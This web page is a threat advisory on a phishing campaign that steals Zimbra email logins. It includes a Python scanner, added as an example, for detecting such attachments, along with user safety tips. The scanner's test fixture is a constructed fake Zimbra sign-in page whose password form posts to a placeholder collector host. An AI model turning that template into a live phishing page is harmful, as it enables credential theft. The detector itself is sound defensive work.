
Digital safety starts here for both commercial and personal use...

Defend Your Business Against the Latest WNY Cyber Threats
We offer safe, secure and affordable solutions for your business and personal networks and devices.



WNYCyber is there to help you to choose the best service providers in Western New York... We DO NOT provide the services ourselves, as we are Internet programmers who have to deal daily with cyber threats... (Ugghhh)... So we know what it's like and what it takes to protect OUR and OUR CUSTOMERS' DATA... We built this website to help steer you to those that can give you the best service at realistic and non-inflated prices. We do not charge or collect any fees.

New Wave of Attack Campaign Targeting Zimbra Email Users for Credential Theft

Cyber Security Threat Summary:
“A new "mass-spreading" social engineering campaign is targeting users of the Zimbra Collaboration email server with an aim to collect their login credentials for use in follow-on operations. The activity, active since April 2023 and still ongoing, targets a wide range of small and medium businesses and governmental entities, most of which are located in Poland, Ecuador, Mexico, Italy, and Russia. It has not been attributed to any known threat actor or group. ‘Initially, the target receives an email with a phishing page in the attached HTML file,’ ESET researcher Viktor Šperka said in a report… ‘The email warns the target about an email server update, account deactivation, or similar issue and directs the user to click on the attached file.’ The HTML file contains a Zimbra login page tailored to the targeted organization, with the Username field prefilled with the victim's email address to make it seem more authentic. Once the credentials are entered, they are collected from the HTML form and sent via an HTTPS POST request to an actor-controlled server” (The Hacker News, 2023).

Security Officer Comments:
To trick recipients into opening the attachment, the emails spoof the sender's address, making it seem like the message is coming from a Zimbra administrator. In some cases, the actors have also sent the emails from Zimbra accounts belonging to previously targeted, legitimate companies, which suggests that the attackers were able to compromise administrator accounts and create new mailboxes to send phishing emails to other targets. Mail sent this way passes ordinary sender checks, because it really does originate from the abused organization's server.

According to researchers, the HTML attachments used in the latest campaign consist mostly of legitimate code; the only malicious element is the login form, whose submit action points at the actor-controlled server. Keeping the file otherwise benign is most likely a tactic to get past anti-spam policies and email security scanners that key on known-bad markup. Notably, because the attachment is opened directly from the email, the login page renders locally in the victim's browser: it looks like the organization's Zimbra sign-in screen, but the address bar shows a local file path rather than the organization's Zimbra address over https://. That address bar is the simplest tell a user has, and the external form action is the simplest tell a scanner has.
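The following is an added example, not code from the page, from ESET, or from The Hacker News: a small scanner, using only the Python standard library, that applies the two indicators just described to an HTML attachment. It flags a form that collects a password but posts it anywhere other than the organization's own Zimbra host, and a username field that arrives prefilled with an email address. The set of trusted hosts, the two sample attachments, and the "collector.invalid" hostname are all assumptions constructed for this example.

```python
# Added example (not from the page, ESET, or The Hacker News): flag an HTML
# email attachment that carries a credential-harvesting login form of the
# kind described above. TRUSTED_HOSTS, both sample attachments and the
# ".invalid" hostname are assumptions constructed for this example.
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the organisation's genuine Zimbra web client host(s).
TRUSTED_HOSTS = {"mail.example.org"}

# Loose check: does a prefilled field value look like an email address?
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


class FormCollector(HTMLParser):
    """Collect every <form> in the document with its action and its <input>s."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        # attrs is a list of (name, value); value is None for bare attributes
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._current = {"action": a.get("action", ""), "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(a)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def analyse_attachment(html, trusted_hosts=TRUSTED_HOSTS):
    """Return a list of findings for one HTML attachment; [] means nothing
    suspicious. Only forms that collect a password are examined, so
    newsletters and other benign HTML are not flagged."""
    parser = FormCollector()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        inputs = form["inputs"]
        if not any(i.get("type", "").lower() == "password" for i in inputs):
            continue  # not a login form
        # A local HTML file that posts credentials anywhere except the real
        # Zimbra host is the core indicator of this campaign.
        host = urlparse(form["action"]).hostname or ""
        if host and host not in trusted_hosts:
            findings.append("password form posts to untrusted host " + host)
        # The campaign prefills the username with the victim's address to
        # look authentic; a genuine login page leaves it empty.
        prefilled = [i.get("value", "") for i in inputs
                     if i.get("type", "text").lower() in ("text", "email")]
        if any(EMAIL_RE.match(v) for v in prefilled):
            findings.append("username field prefilled with an email address")
    return findings


# Constructed sample: mostly ordinary markup, one form that exfiltrates.
SAMPLE_PHISH = """<!doctype html>
<html><head><title>Zimbra Web Client Sign In</title></head><body>
<div class="LoginScreen"><h1>Zimbra</h1>
<p>Your mail server has been updated. Please sign in to continue.</p>
<form method="post" action="https://collector.invalid/zimbra/login.php">
  <input type="text" name="username" value="jdoe@example.org">
  <input type="password" name="password">
  <input type="submit" value="Sign In">
</form></div></body></html>"""

# Constructed sample: same form, but posting to the real host with an
# empty username, which is what a legitimate page would do.
SAMPLE_BENIGN = """<html><body>
<form method="post" action="https://mail.example.org/">
  <input type="text" name="username" value="">
  <input type="password" name="password">
</form></body></html>"""

if __name__ == "__main__":
    for name, doc in (("phish", SAMPLE_PHISH), ("benign", SAMPLE_BENIGN)):
        print(name, "->", analyse_attachment(doc) or ["clean"])
```

Run it on the HTML parts of a quarantined message at the mail gateway or in a SOAR playbook. A form whose action has no host (a relative path) is skipped here because a locally opened file cannot post it anywhere useful; a stricter policy, which many organizations choose, is to quarantine any HTML attachment containing a password field at all, since a server-update notice has no legitimate reason to carry one.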

Suggested Correction(s):

  • Do not open emails or download software from untrusted sources
  • Do not click on links or attachments in emails that come from unknown senders
  • Do not supply passwords, personal, or financial information in response to an email; a real Zimbra administrator does not need your password and should not ask for it
  • Always verify the email sender's email address, name, and domain, keeping in mind that this campaign has also sent mail from genuine, already-compromised Zimbra accounts
  • Before entering credentials, check the browser address bar: a login page opened from an attachment shows a local file path, not your organization's Zimbra address over https://
  • Enable multi-factor authentication on email accounts so that a stolen password alone is not enough to log in
  • Have your mail gateway block or quarantine HTML attachments, which have no legitimate use in a server-update notice
  • If credentials may have been entered, change the password immediately and have I.T. check the account for new mailboxes, forwarding rules, or other changes
  • Backup important files frequently and store them separately from the main system
  • Protect devices using antivirus, anti-spam and anti-spyware software
  • Report phishing emails to the appropriate security or I.T. staff immediately


IOCs:
https://www.welivesecurity.com/en/eset-research/mass-spreading-campaign-targeting-zimbra-users/

Link(s):
https://thehackernews.com/2023/08/new-wave-of-attack-campaign-targeting.html